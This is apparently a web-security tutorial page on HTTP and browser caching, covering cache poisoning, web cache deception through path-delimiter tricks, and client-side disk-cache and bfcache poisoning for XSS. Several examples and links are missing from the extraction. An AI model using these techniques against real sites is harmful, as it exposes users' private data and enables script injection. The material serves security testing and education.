Caching
Remember static content to resolve less requests by the backend
Last updated
Remember static content to resolve less requests by the backend
Last updated
To save on bandwidth and respond faster, large websites often implement a caching proxy in front of their regular servers that have a simple task: remember static content and handle requests that don't need the backend. While sounding simple, it comes with a lot of questions, like what needs to be cached and to who?
There are a few concepts that all caches share, and are useful to understand. First of all, Cache Rules. These are the decisions the caching proxy makes to figure out if a request/response needs to be cached for future requests. Some dynamic APIs should never be cached, so you'll often see these target static resources like JS/CSS or images.
Then there are Cache Keys being the normalized versions of requests that find which requests should return equivalent responses, without actually asking the backend. These often include the path, query parameters, and potentially some headers. If two requests with the same cache key come in, the 1st will be resolved and the 2nd will be instantly returned from the cache of the 1st response.
By sending the same requests to an endpoint multiple times, there are some different ways to can detect the effects of caching:
Sometimes the response contains specific headers such as X-Cache-Status: MISS
(meaning it wasn't stored before, but is now) or CF-Cache-Status: HIT
(meaning it was stored and now returned from the cache). BYPASS
often means it wasn't cached and instead requested from the backend.
If the backend is noticeably slow, you may be able to measure when a resource responds quicker than normal because it's directly from the caching server.
If you can edit the underlying resource (such as a profile image), request it, change your image and then quickly request it again to check if the change had an effect, or if it takes some more time.
While testing, it is common to use cache busters to explicitly not cache something, or cache it only with a specific identifier for testing. You can put the same random string into both of your testing requests, guaranteeing that it won't have been cached before by other users but maybe it will be now that you've requested it. This is often done with a ?cb=$RANDOM
query parameter.
To check if a page was loaded through bfcache, keep an eye on the Applications -> Back/forward cache section. While navigating this will either show "Not served from back/forward cache" (with a reason if you pressed the Back button) or "Successfully served from back/forward cache" when it was successful.
Restoring from this cache means all JavaScript and DOM state (also input values) will remain the same, allowing an attacker to attack this data with a localStorage
XSS or anything that will be reloaded. In some more complex attacks it can be useful to be able to clear the bfcache, which is possible by simply overflowing the maximum of 6 navigations, and then going back with history.go(-n)
to your target page. The following writeup explains this idea with great interactive visuals:
fetch()
I previously stated that a top-level navigation will always first revalidate, and then either get the page from cache if it hasn't changed or get the new one. This is not entirely true, as there is actually another way to load a URL top-level, that is via bfcache. When pressing the back button (or triggering it via JavaScript), the nest page may be loaded from either one of three steps:
If it is stored in the Back/forward cache, return it directly from there
If it is stored in the disk cache, return it directly from there
Send a request to the server and return that response
It's hard to influence 1, but 2 can be poisoned by a fetch()
call to store a cache entry on a URL with some special headers. If the response to this fetch is of type text/html
and contains an XSS payload, the top-level navigation from the cache may trigger it even though the navigation shouldn't normally be able to send special extra headers or a request method such as PUT
, DELETE
or PATCH
.
When two requests normalize to the same cache key, they should always result in the same response. With tricky parsing and rules, however, this can sometimes not be the case. Take any request that a regular user's browser makes while browsing the website, such as a resource or page. If an attacker can make a request with the same cache key and cause a different response than expected to be cached, it can be disastrous for the user as it often makes the feature/application unusable.
That is the gist of Cache Poisoning, altering a request to return another cacheable response that users will encounter. It is explained in more detail with examples and labs below:
The most important part in exploiting this is knowing the cache key. If you can alter your request enough to cause a different response while keeping the same cache key, it will be vulnerable. Note that your alternative response must still be cacheable, this is where cache rules come in. If it causes a 400 Bad Request or 404 response, it often will be denied from the cache and requested the 2nd time anyway. You must have a successful but different response.
When working with source code, it is best to look for request attributes that cause conditions to happen, often about returning a different kind of response (eg. the Accept:
header). In a blackbox scenario fuzzing may be a better option, trying weird variations of the request while keeping track of if it's still being cached under the same key or not.
Sometimes a very lax cache key can miss things like query parameters that are important for controlling a backend response. Another sneaky method is using the #
in a request. While these are not normally sent over HTTP, they can be and the backend server may deal with it in a strange way:
The above's cache key may be truncated to /static/main.js
, while the backend interprets the path traversal and returns the uploaded malicious JavaScript file.
If cache is shared between users, private data should not end up in the cache. In Cache Deception, an attacker prepares a URL that a victim will visit to get cache some of their personal data with their authentication. The attacker can then request the same URL to get back the cached response without authentication.
Routes like /api/profile
are normally ruled out from the cache, while files under /static
or with the .js
extension will always be cached. If you can confuse the URL parsers of the caching proxy and backend such that it thinks your URL matches the cache rules, while it returns private user data, you have Cache Deception!
Nginx will resolve even encoded path traversals, so one example exploit would be sending the victim to:
The caching proxy like Cloudflare may be configured to cache every path starting with /static/
, while Nginx passes the decoded and resolved /api/profile
to the backend, returning the currently logged-in user's private data. This will now be cached, and when the attacker visits the above URL shortly after the victim, they will receive their victims response.
For file extensions, it is common to try and find a character that truncates the path, such as ;.js
in Tomcat or %00.js
when strings are null-terminated. If the path is matched including the query string, simply adding the extension after a question mark like ?.js
will do. When it is normalized an encoded one may do the trick(%3F.js)
.
You may be able to see the pattern here, simply fuzz all potential characters and their encoded forms to try and find delimiters. Then exploit it as follows:
In some PHP configurations, it is also common to rewrite every suffix path of a .php
file to the same endpoint, for example:
All of these tricks require the cache key to not include any unpredictable data, such as the session cookie. The cache needs to be shared between users so that an unauthenticated attacker can retrieve the stolen data.
Browsers will cache certain responses in the disk or memory cache. While testing, make sure to uncheck the box in the Network tab of your DevTools. To clear this cache, the easiest way is to clear it globally via chrome://settings/clearBrowserData
(Chrome) or about:preferences#privacy
(Firefox).
In the table of requests, you'll see in place of the Size column if the response came from the cache. You may also see 304 Not Modified status codes for responses that are cached, but revalidated to ensure they haven't changed. Top-level navigations will always revalidate the cache, but fetch()
es or loading resources can be retrieved directly from the cache with no request to the server.
The header decides if and for how long a response will be cached, and how it is revalidated. The Vary
header adds the specified request headers to the cache key. If no such headers are given, the browser will cache the response by default but revalidate it every time it is used (with the If-Modified-Since
or If-None-Match
header). If you need to get the cached version of a response for some reason without revalidating first, fetch()
has a option that you can set to force-cache
. This is used in .
One edge case is which need to be registered with a specific JavaScript URL. These skip the cache by default, but using the { updateViaCache: 'all' }
option you can enable it. This may allow you to poison the cache client-side and then load a service worker from there for persistent XSS. See for more details.
Another use for disk cache is the fact that the HTML will always stay the same, while JavaScript code is re-executed. If this fetches a payload dynamically, it can allow you to run a payload multiple times on one static DOM, even if during regular navigations it would be different every time. This could be useful in limited CSS Injection scenarios. See for an example, and Poisoning top-level navigation with fetch() for how to perform a top-level navigation to a disk cached resource without revalidating. It may also be used for retrieving an earlier response with XSS that the user navigated away from, and cannot get back to due to corruption or a different cookie etc. is an example of this.
To protect against attacks involving caches such as XS-Leaks or Client-Side Cache Poisoning/Deception, they are separated by eTLD+1 as specified in . This means subdomains will share a cache, but a separate attacker's domain will not.
While the disk cache helps with speed, the browser's (Back and Forward) buttons should ideally keep the state of the webpage as well. This is what the Back/forward cache (or "bfcache") does, remembering pages you navigate through and their JavaScript heap. You can trigger this programatically with history.back()
or the more generic history.go(n)
.
To skip option 1, there are some rules that make bfcache disallowed, like if the . This can be achieved by first getting on an attacker's page, and then opening the URL you will later restore from cache. Then navigate to the URL that will poison the cache, and finally execute history.back()
. Because it still has an opener reference to the attacker's page, the bfcache won't be used, but the disk cache from the fetch will.
For examples of this check out the writeups of and the .
This is often achieved with extra request headers. Some of these headers will cause the application to act differently, maybe return a redirect or a different response format. Specifically, NextJS has been .